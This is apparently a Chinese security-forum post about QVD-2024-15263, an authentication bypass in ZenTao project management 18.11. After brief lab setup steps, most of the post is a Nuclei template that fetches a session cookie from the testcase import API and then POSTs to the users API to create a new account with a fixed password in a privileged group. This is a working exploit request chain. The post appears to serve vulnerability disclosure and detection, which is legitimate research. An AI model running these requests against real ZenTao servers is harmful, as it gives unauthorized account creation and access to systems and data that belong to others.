论坛首页 > 技术文章投稿区 > 技术文章

QVD-2024-15263

江月   ·   发表于 2024-04-28 21:20:00   ·   技术文章

漏洞简介

禅道项目管理系统身份认证绕过

下载地址

https://www.zentao.net/download.html

系统环境

Linux Centos7.6
禅道源码包:18.11 ZenTaoPMS-18.11-zbox_amd64.tar

操作步骤

1、解压ZenTaoPMS-18.11-zbox_amd64.tar 到 /opt目录
2、切换至目录cd /opt/zbox/
3、启动:./zbox start
4、访问:127.0.0.1

Nuclei for Poc

id: QVD-2024-15263

info:
  name: Oa-Chandao-AuthBypass
  author: xxx
  severity: info
  description: description
  reference:
    - https://
variables:
  username: "{{to_lower(rand_base(3))}}"
  metadata:
    Hunter-query: xxx
  tags: chandao

http:
  - raw:
      - |
        GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /zentao/api.php/v1/users HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{plt}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
        Connection: close
        Content-Type: application/json

        {"account":"{{username}}","password":"Qwe123","realname":"{{username}}","role":"","group":"2"}
    extractors:
      - type: regex
        part: header
        name: plt
        internal: true
        regex: 
          - 'zentaosid(.*?);'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(header_2,"zentao") && status_code==403

验证

打赏我,让我更有动力~

1 条回复   |  直到 16天前 | 279 次浏览

小瑟斯
发表于 16天前

666

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.